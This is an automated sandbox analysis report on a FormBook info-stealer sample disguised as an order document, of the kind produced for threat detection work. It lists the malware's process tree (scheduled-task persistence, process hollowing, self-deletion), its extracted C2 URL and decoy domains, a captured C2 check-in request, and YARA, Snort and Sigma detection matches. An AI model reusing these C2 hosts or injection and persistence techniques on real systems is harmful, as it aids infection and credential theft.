Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Order 275594 04-D4E5A.exe

Overview

General Information

Sample Name:Order 275594 04-D4E5A.exe
Analysis ID:433223
MD5:3f4cc7f69f0d3b70a20dfd2243bc16db
SHA1:b0e2841f5c7d754e4af796088b659c204edf5fd8
SHA256:6e556200dba57fdce36308bbd34c19398ecf627828627b380244aeede2f90176
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspect Svchost Activity
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Order 275594 04-D4E5A.exe (PID: 2024 cmdline: 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe' MD5: 3F4CC7F69F0D3B70A20DFD2243BC16DB)
    • schtasks.exe (PID: 6040 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EDclkRlYpO' /XML 'C:\Users\user\AppData\Local\Temp\tmp285B.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Order 275594 04-D4E5A.exe (PID: 3596 cmdline: {path} MD5: 3F4CC7F69F0D3B70A20DFD2243BC16DB)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 5392 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 1332 cmdline: /c del 'C:\Users\user\Desktop\Order 275594 04-D4E5A.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.couragepennies.com/dlwk/"], "decoy": ["universitypinesseniorliving.com", "mtcy0852.com", "abslevha.com", "breedersbatch.com", "longlivegenx.com", "yibaogy.com", "sex8e.com", "luxsot.com", "arizonafinevioins.com", "lalabusha.xyz", "everycases.net", "unhealthyisunweathly.com", "anchorphonemounts.com", "teachuswell.com", "theshadedco.com", "wallopchain.com", "balitourexplore.com", "resctub.com", "freshlyfadedapparel.com", "betamartgroceries.com", "jordanbaileyportfolio.com", "kellenkamm.com", "starwarsnyc.com", "banhsinhnhat.net", "keminadentalcare.com", "belocalsearch.com", "cihedu-formation.com", "merroir.net", "rjdsouza.com", "evolutionhvac.net", "larepublica0.com", "filmarabia.com", "14dzb.com", "realoneathletics.com", "easx.systems", "centerzasporocila.com", "divishasharma.com", "livinghistory.city", "itsoftwarekrzysztofradwan.com", "chinhhanghm46.site", "may252021.com", "a2zcreditrepair.com", "1comcall.com", "hourgroups.com", "tabletz-llc.com", "nliplace.com", "myproductives.com", "gogo90s.com", "therotaryphone.com", "rosaouladi.com", "myfragnance.com", "nhbeitai.com", "medermatologia.com", "7750118.com", "bandweven.com", "blue-wms.net", "dacyclinu.com", "creativehuesdesigns.com", "misteraircondition.com", "bryantbe.com", "bdgunshi.com", "51zheyang.com", "israelemirates.travel", "wildslaskan.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 20 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.2.Order 275594 04-D4E5A.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        17.2.Order 275594 04-D4E5A.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        17.2.Order 275594 04-D4E5A.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5392
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5392
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: , ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3388, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 5392

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.couragepennies.com/dlwk/"], "decoy": ["universitypinesseniorliving.com", "mtcy0852.com", "abslevha.com", "breedersbatch.com", "longlivegenx.com", "yibaogy.com", "sex8e.com", "luxsot.com", "arizonafinevioins.com", "lalabusha.xyz", "everycases.net", "unhealthyisunweathly.com", "anchorphonemounts.com", "teachuswell.com", "theshadedco.com", "wallopchain.com", "balitourexplore.com", "resctub.com", "freshlyfadedapparel.com", "betamartgroceries.com", "jordanbaileyportfolio.com", "kellenkamm.com", "starwarsnyc.com", "banhsinhnhat.net", "keminadentalcare.com", "belocalsearch.com", "cihedu-formation.com", "merroir.net", "rjdsouza.com", "evolutionhvac.net", "larepublica0.com", "filmarabia.com", "14dzb.com", "realoneathletics.com", "easx.systems", "centerzasporocila.com", "divishasharma.com", "livinghistory.city", "itsoftwarekrzysztofradwan.com", "chinhhanghm46.site", "may252021.com", "a2zcreditrepair.com", "1comcall.com", "hourgroups.com", "tabletz-llc.com", "nliplace.com", "myproductives.com", "gogo90s.com", "therotaryphone.com", "rosaouladi.com", "myfragnance.com", "nhbeitai.com", "medermatologia.com", "7750118.com", "bandweven.com", "blue-wms.net", "dacyclinu.com", "creativehuesdesigns.com", "misteraircondition.com", "bryantbe.com", "bdgunshi.com", "51zheyang.com", "israelemirates.travel", "wildslaskan.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\EDclkRlYpO.exeMetadefender: Detection: 20%Perma Link
          Source: C:\Users\user\AppData\Roaming\EDclkRlYpO.exeReversingLabs: Detection: 50%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Order 275594 04-D4E5A.exeMetadefender: Detection: 20%Perma Link
          Source: Order 275594 04-D4E5A.exeReversingLabs: Detection: 50%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPE
          Source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.Order 275594 04-D4E5A.exe.10000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeUnpacked PE file: 0.2.Order 275594 04-D4E5A.exe.10000.0.unpack
          Source: Order 275594 04-D4E5A.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Order 275594 04-D4E5A.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.353720348.0000000006300000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order 275594 04-D4E5A.exe, 00000011.00000002.363040639.0000000001A6F000.00000040.00000001.sdmp, svchost.exe, 00000017.00000003.362268250.0000000000D00000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order 275594 04-D4E5A.exe, svchost.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.353720348.0000000006300000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 4x nop then pop ebx17_2_00407B02
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 4x nop then pop edi17_2_00417D6B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx23_2_00357B02
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi23_2_00367D6B

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 184.168.131.241:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 184.168.131.241:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.couragepennies.com/dlwk/
          Source: global trafficHTTP traffic detected: GET /dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE HTTP/1.1Host: www.filmarabia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /dlwk/?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3DR3Chi1RjI9I2gNlG9lXXXNlrydudUfV5dRmlhE HTTP/1.1Host: www.filmarabia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.filmarabia.com
          Source: explorer.exe, 00000012.00000000.330665064.000000000F6C0000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.304079572.0000000002483000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Order 275594 04-D4E5A.exe, 00000000.00000002.308638429.0000000005770000.00000002.00000001.sdmp, explorer.exe, 00000012.00000000.327097499.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: svchost.exe, 00000017.00000002.475573917.0000000003B5F000.00000004.00000001.sdmpString found in binary or memory: https://dan.com/domain-seller/future-parallel?UR-=9rBHCraXjjKXgv1p&m48=Jq8U7OueiU8HflHyK8f2qmPQo6WO3

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 17.2.Order 275594 04-D4E5A.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.Order 275594 04-D4E5A.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.Order 275594 04-D4E5A.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.Order 275594 04-D4E5A.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000000.299991794.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.362777252.0000000001490000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.362753354.0000000001460000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.469734076.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.304744303.0000000003496000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.469416367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
